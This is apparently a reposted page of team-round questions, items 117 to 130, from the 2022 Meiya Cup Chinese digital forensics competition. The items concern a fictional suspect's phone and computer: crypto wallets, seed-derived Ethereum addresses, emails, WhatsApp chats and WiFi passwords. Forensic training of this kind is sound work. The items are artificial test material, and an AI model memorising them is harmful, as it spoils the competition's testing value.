    A. 2022-10-07 14:47时
    B. 2022-10-07 14:49时
    C. 2022-10-07 14:52时
    D. 2022-10-07 14:54时

  117. [多选题] 朗尼的手机里,有什么应用程序与将黑钱 (比特币) 转换成另一加密货币的地址有关? (2分)
    A. Metamask
    B. Opensea
    C. Safepal
    D. YouTube

  118. [单选题] 朗尼的手机里,于2022-10-07,15:07时至15:08时做过什么动作? (以时区UTC+8回答) (2分)
    A. 登录 ‘Metamask’
    B. 登录 ‘Opensea’
    C. 屏幕截图 (Screen Capture)
    D. 登录 ‘YouTube’

  119. [多选题] 承上题,从这个动作中能找到什么资讯? (1分)
    A. Opensea.io
    B. Ethereum Main Network
    C. Your purchase is complete
    D. Subtotal = 0.0253 ETH
    E. Good Luck

  120. [填空题] 在朗尼的计算机旁找到 ‘MetaMask’ 的密码是 ‘opensea741’,找出朗尼计算机里的 ‘MetaMask’ 中有多少加密货币余额? (不要输入 ‘.’,以阿拉伯数字回答,如 0.137 需回答 0137) (2分)

  121. [填空题] 朗尼的计算机曾用什么电邮地址登录电邮帐号? (不要输入答案中的 ‘@’ 及 ‘.’,以大写英文及阿拉伯数字回答,如 name@mail.com,需回答 NAMEMAILCOM) (1分)

  122. [填空题] 什么电邮账号曾接收过上述电邮地址发送的电邮?(不要输入答案中的 ‘@’ 及 ‘.’,以大写英文及阿拉伯数字回答,如 name@mail.com,需回答 NAMEMAILCOM) (1分)

  123. [多选题]承上题,上述的电邮附件包含哪些类型的档案? (3分)
    A. pdf
    B. doc
    C. png
    D. txt
    E. jpg

  124. [填空题] 上述电邮附件里的文件,被遮蔽的英文单字是什么? (以大写英文回答) (3分)

  125. [填空题]根据上述电邮附件里找到的回复种子 (Recovery Seed),计算朗尼在 ‘MetaMask’ 使用的以太币 (Ethereum) 地址。 (提示: BIP-44 derivation path = m/44’/60’/0’/0/0) (以大写英文及阿拉伯数字回答) (3分)

  126. [单选题]在2022年9月28日18时51分 (UTC+8),朗尼曾经在手机用WhatsApp与王景浩对话,语句 [有灯,风扇经常在转], 回复这句话的相关语句是什么? (1分)
    A. 你有推介吗?
    B. 我之前放在你家的机械运作正常吗?
    C. 有灯号 风扇有转动?
    D. 帅吗?

  127. [单选题] 朗尼通过手机相约王景浩于10月15日到哪一个地区食晚饭? (1分)
    A. 荃湾
    B. 湾仔
    C. 九龙城
    D. 九龙塘

  128. [填空题] 朗尼手机的 ‘WhatsApp’ 号码是什么? ( 号 码 ) @s.whatsapp.net? (以阿拉伯数字回答) (1分)

  129. [多选题]朗尼的手机曾连接以下哪一个WIFI网络? (2分)
    A. taiiphone
    B. rooneyhome
    C. Function Room
    D. TP-Link

  130. [单选题]朗尼的手机曾连接WIFI [SSID: faifai], 它的登录密码是什么 ? (2分)
    A. abcd5678
    B. aaaa0000
    C. rooney111
    D. rdfu1234文章来源地址https://www.toymoban.com/news/detail-436900.html

到了这里,关于2022“美亚杯”第八届中国电子数据取证大赛-团队赛题目的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 2018年第三届 美亚杯电子取证 个人赛题解

    取证直接获取 FC20782C21751BA76B2A93F3A17922D0 E 查看硬盘个数 3个 C LBA开始地址 我们首先确定操作系统分区 可以发现是 E 盘 然后我们开始看物理地址 物理位置:32,213,303,296 除以 512 答案为D 这里就是需要通过扇区x512来计算 答案为E C 这里真不会 看了看 主要是看 磁盘十六进制 第1

    2024年02月06日
    浏览(31)
  • 第八届中国开源年会(COSCon'23)启动!

    *海报设计师:朱亿钦(居居) 一年一度的开源盛会,COSCon\\\'23 第八届中国开源年会,将于10月28~29日,在四川成都市高新区菁蓉汇召开!本次大会的主题是:“开源:川流不息、山海相映”! 大会基本信息: 时间: 2023年10月28日~10月29日 地点: 成都菁蓉汇 报名链接: https:

    2024年02月16日
    浏览(34)
  • 服务器部分 2023盘古石杯全国电子数据取证大赛 技能赛晋级赛

    MD5: FF4AB93F852B23DD759A6810754557A8 加密容器密码:usy1UN2Mmgram^d?0E5r9myrk!cmJGr 后期服务器应该会再更新一版,全部的题解不一定会更新,估计一年内会出吧,博主马上大四了,在各种考试。 取证软件未解析软路由物联网四块检材 仿真未检测到操作系统型号 将软路由四块检材同时选中

    2024年02月05日
    浏览(55)
  • 2023年 首届盘古石杯全国电子数据取证大赛 技能赛决赛 服务器题解析

    root@P@88w0rd 方法1 john的电脑使用账号john密码paofen登录,chrome浏览器中密码管理器内查看 切记仿真时不要清空账号密码 方法2 使用计算机取证软件解析john的电脑的镜像浏览器记录密码 TrueNAS-13.0-U4 使用虚拟机内TrueNAS显示的IP地址用浏览器访问后使用账号root 密码P@88w0rd 登陆后在

    2024年02月11日
    浏览(41)
  • 2022第四届长安杯电子取证竞赛 服务器赛时思路&题解 Zodi4c

    VC容器密码为:2022.4th.changancup! 我赛时的做题思路和关心老师的讲解基本一致,只是没了上帝视角,本人只开了服务器,所以案件的关联性方面会差点,专注于服务器本身,以及比赛时是如何思考的。 队伍分工为本人服务器,毛同学为PC+基础检材分析,刘同学为手机+apk+exe逆

    2024年02月02日
    浏览(78)
  • 中国顶级CTF竞赛网络安全大赛--2022网鼎杯re2解题思路

    PEID查不出来,用了die,显示是UPX3.96的壳,用了脱壳机,脱不了,只能手动脱壳,拖入x64dbg,F9运行到程序领空,很明显的特征,push: 无脑使用ESP定律大法,对ESP下硬件访问断点: F9运行,在pop处停下: F4运行到下面第一个jmp,F8,进去又是一个jmp,继续F8,到达OEP: 使用x

    2023年04月22日
    浏览(43)
  • 华为ICT大赛 2022-2023 中国区 实践赛总决赛--云赛道(本科赛道)理论部分真题

    大数据模块(共4题): 1、Kafka集群现已被多家不同公司作为多种类型的实时数据管道和实时消息系统使用。以下关于Kafka的描述,正确的是哪些项?(多选题) A.在发布-订阅消息系统中,消费者可以订阅一个或多个topic。同一条数据可以被多个消费者消费,数据被消费后会立马删除

    2024年02月07日
    浏览(46)
  • 电子数据取证(一)

    电子数据的特点 **1、以数字化形式存在。**所有的电子数据都是基于计算机应用和通信等电子化技术手段形成的,用以表示文字、图形符号、数字、字母等信息的资料。与其他证据种类不同,电子数据在本质上而言是以电子形式存储或者传输的。 **2、具有开放性的特征。**从

    2024年02月13日
    浏览(39)
  • 一文读懂电子数据取证

    科学的运用提取和证明方法,对从电子数据源提取的证据进行保护、收集、验证、鉴定、分析、解释、存档和出示,以有助于进一步的犯罪事件重构或帮助识别某些计划操作无关的非授权性活动。 在网络安全大环境中,信息安全可以看作是解决事前防御问题,电子取证则是解

    2024年02月13日
    浏览(47)
  • 第二届“中科实数杯”全国电子数据取证 wp

    准备参加第三届的比赛了,特意把第二届的比赛写一下,第一次写wp,不足之处请多多指点 第二部分------案件背景介绍 🌎王刚(英文名kugoo)是一家国内大型电子商务公司的服务器管理员,他负责公司多台服务器的日常运维管理。 王刚利用个人职位之便,私下将客户的资料

    2024年02月09日
    浏览(90)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包